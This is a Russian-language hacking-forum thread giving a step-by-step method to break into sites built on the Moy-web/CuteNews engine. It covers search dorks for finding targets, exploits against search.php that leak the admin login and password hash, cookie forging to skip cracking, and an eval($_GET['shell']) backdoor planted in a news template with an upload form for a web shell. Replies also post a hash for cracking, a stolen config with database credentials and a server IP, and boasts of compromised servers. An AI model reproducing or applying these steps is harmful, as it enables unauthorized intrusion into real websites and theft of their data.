Взлом сайта на Moy-web

[OveRKinG]

Заходим в админку

1. Поиск в гуглом:
© Project -= Moy-weB =-


2. После того как погуглили идем на целевой сайт и заходим в директорию /news/ если есть, то хорошо, если нет гуглим дальше.
Так же обязателен файл /news/search.php

3. Дальше используем сплоит для поиска админа

Код:

$target = 'http://localhost/cutenews.1.4.5/search.php';  здесь указываем путь к файлу search.php.

3. Следующим шагом будет использование сплоита для поиска MD5 хэша админа.
$target = 'http://localhost/cutenews.1.4.5/search.php'; Путь к файлу search.php
$username = 'waraxe'; Ник админа (получен с помощью первого сплоита).

Если не хотите использовать сплоиты, вы можете восплользоваться этим сайтом

4. Расшифровываем хэш. И идем в админку сайта - /news/

Заливаем шелл

1. Идем в Настройки - Редактировать шаблоны - Активные новости

2. Видим текстовое поле. Туда пишем:

Код:

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

3. Далее проверяем news/show_news.php?shell=phpinfo();
Должна появиться информация о PHP. Приступаем к заливке шелла.

4. Создаем файл HTML :

Код:

<form action=http://site.com/news/show_news.php?shell=copy($_FILES[file][tmp_name],$_GET[aa]);&aa="локальный путь сайта"\news\shell.php 
method=post enctype=multipart/form-data> 
<input type=file name=file><br> 
<input type=submit value=Загрузить><br> 
</form>

5. Радуемся шеллу по адресу - [Ссылки могут видеть только зарегистрированные пользователи. ]

P.S. Данные для подключения к БД находятся в /config/config.php

Автор MERRON ©.Взято с xaker.ru
Буду не против благодарностей.
Флудерам тут не место.

[Underwhy]

Хочу лишь сказать что Moy-Web крайне редкий двиг, и способ этот выложен.. мм

26.11.2008, 01:34
на nulled.ws

[fuzzion]

советую юзать этот сайт для нахождения логина админа.

_http://game-zone.pp.ru/cuteuser.php

[bool]

"Локальны путь сайта" где это взять?

[OveRKinG]

Ну это как тебе сказать вот к примеру жук как должен выглядить поиск:
http://zhyk.ru/cutenews.1.4.5/search.php
Подставляеш под локалхост имя сайта.
Вот тот же пример:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Под сайт.ком подставляй свое и будет тебе счастье.

[MERRON]

Под термином "Локальный путь" я имел в виду, что-то типа
/home/site.ru/www/news/data/ (Linux система).

Способ старый - это да. Но я нигде не видел нормального способа залива шелла.

[387]

Это обычный скрипткидинг, читайте багтраки и узайте норм уязвимости по шопам, у меня когда занимался вскими подобными гадостями было неск к баз кред.
Но на самом деле быстро надоедает, да и вырастаешь.

[langes]

куда эксплоит вписывать?(:

[rinox]

кто может расшифровать хэш плиз? b54d8c4279b82b67b746755a84b76743

Добавлено через 28 минут
заюзал все онлайн декрипторы отсюда ht_tp://forum.antichat.ru/thread11028.html не помогло

на всех онлайнках пишет типо хэш не найден в нашей базе

[Xacan]

Цитата: Сообщение от rinox кто может расшифровать хэш плиз? b54d8c4279b82b67b746755a84b76743

Откуда взят хеш?

[Chipito]

Для того чтоб не расшифровывать хеш и зайти в админку используй мануал:
Скачиваем:
Firefox
Плагин Cookies Editor для Firefox


1. Находим сайт на движке moy-web. Удобно искать запросами, которые я написал выше.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

Устанавливаем Firefox и плагин для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ HTTP:// напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные пользователи. ] напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))
(С)Netprostor

[mrdemon]

Этим способом можно издеваться над зарубежными? или только мой веб?

[Underwhy]

Цитата: Сообщение от mrdemon Этим способом можно издеваться над зарубежными? или только мой веб?

Способ можно применить везде где стоит админка cute news

[langes]

Зачем расшифровывать хеш?используйте плагин к лисе и будет вам счастье)

[IncubusX]

Код:

$L2JBS_config["mysql_host"]="localhost";    // IP адрес MySQL-сервера     ["localhost"]
$L2JBS_config["mysql_port"]="3306";        // Порт              ["3306"]
$L2JBS_config["mysql_db"]="l2rt";        // Имя игровой базы         ["l2jdb"]
$L2JBS_config["mysql_login"]="root";        // Логин             ["root"]    
$L2JBS_config["mysql_password"]="root";        // Пароль            ["root"]
$htitle="L2tusovka";                // Титул сайта
$fut="© Lineage-II [Ссылки могут видеть только зарегистрированные пользователи. ] 2010";        // Подпись в низу сайта
$top="50";                    // Количество игроков в списке ТОП
$hserver="81.200.81.145";            // IP адрес сервера
$portgame="7777";                // Порт игрового сервера
$portlogin="9014";                // Порт логин сервера

Однако база даже не создана, всего на сервере 4 служебных базы.
ЗЫ Зато приличный дедик, жаль домашний комп всего лишь..

Код:

Провайдер      Center of Children Telemedicin and new information
Входящая скорость     2.37 Mбит/сек
Исходящая скорость     5.55 Mбит/сек
Пинг     56.272 мсек

Добавлено через 3 часа 34 минуты
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Ещё 2 шелла 1 линь, другой Вин7